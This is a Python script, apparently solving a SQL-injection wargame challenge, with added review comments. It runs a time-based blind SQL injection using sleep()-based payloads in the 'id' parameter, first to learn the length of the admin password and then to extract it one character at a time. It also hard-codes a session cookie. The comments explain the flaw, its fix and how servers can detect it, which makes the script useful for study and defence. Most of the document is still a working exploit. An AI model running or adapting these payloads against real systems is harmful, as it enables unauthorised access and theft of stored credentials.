import requests
import time

def request(payload):
    """Send *payload* as the ``id`` query parameter and return the elapsed seconds.

    The response itself is discarded; only the wall-clock duration of the
    round trip is returned, which the caller compares against a threshold.
    The measured time includes network latency as well as server processing,
    so the result is noisy on a slow or congested link.
    """
    began = time.time()
    # NOTE(review): the target is addressed over plain http://, so the session
    # cookie below travels unencrypted on every probe.
    target = "http://los.rubiya.kr/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
    # NOTE(review): a PHPSESSID value is hard-coded and published with the
    # script; a session identifier belongs in the environment or a prompt,
    # and one that has been posted should be treated as disclosed.
    session_headers = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    # requests URL-encodes the parameter value; no timeout is passed, so a
    # stalled connection blocks here indefinitely.
    requests.get(target, params={'id': payload}, headers=session_headers)
    return time.time() - began

# Stage 1: infer the length of the admin row's pw value from response latency.
# Each probe makes the database sleep(3) only when length(pw) equals the
# candidate, so a round trip slower than 2.8 s is read as "match".
# This works only if the endpoint places the `id` parameter inside a quoted
# SQL string without binding it (presumably the case for this challenge; the
# server code is not shown here). Binding `id` as a query parameter removes
# the injection point. On the server side the run shows up as up to 100
# near-identical GETs whose `id` value contains if()/sleep().
length = 0
for candidate in range(0, 100):
    payload = "' or id='admin' and if(length(pw)=" + str(candidate) + ",sleep(3),1)-- x"
    elapsed = request(payload)
    if elapsed > 2.8:
        length = candidate
        break

# A single parenthesised argument prints the same text under Python 2 and 3.
# If no probe crossed the threshold, length is still 0 at this point.
print("Find Admin Pw Length[*] = " + str(length))

# Stage 2: recover pw one character at a time with the same latency oracle.
# For each 1-based position, every printable ASCII code (32..126) is tried
# until one probe is slower than 2.8 s; that code is taken as the character.
# A position where no probe crosses the threshold contributes nothing, so the
# result can silently come out shorter than `length`.
# Worst case is 95 requests per character, each carrying substring()/ascii()/
# sleep() in `id`; that request volume and the bimodal latency are what
# server-side logging or a WAF rule would key on.
admin_pw = ""
for position in range(1, length + 1):
    for code in range(32, 127):
        payload = (
            "' or id='admin' and if(ascii(substring(pw," + str(position)
            + ",1))=" + str(code) + ",sleep(3),1)-- x"
        )
        if request(payload) > 2.8:
            admin_pw += chr(code)
            break
# NOTE(review): the page lost its indentation; this print is placed after the
# loops, mirroring the length report above. Confirm against the original.
print("Find Admin Pw[*] = " + admin_pw)

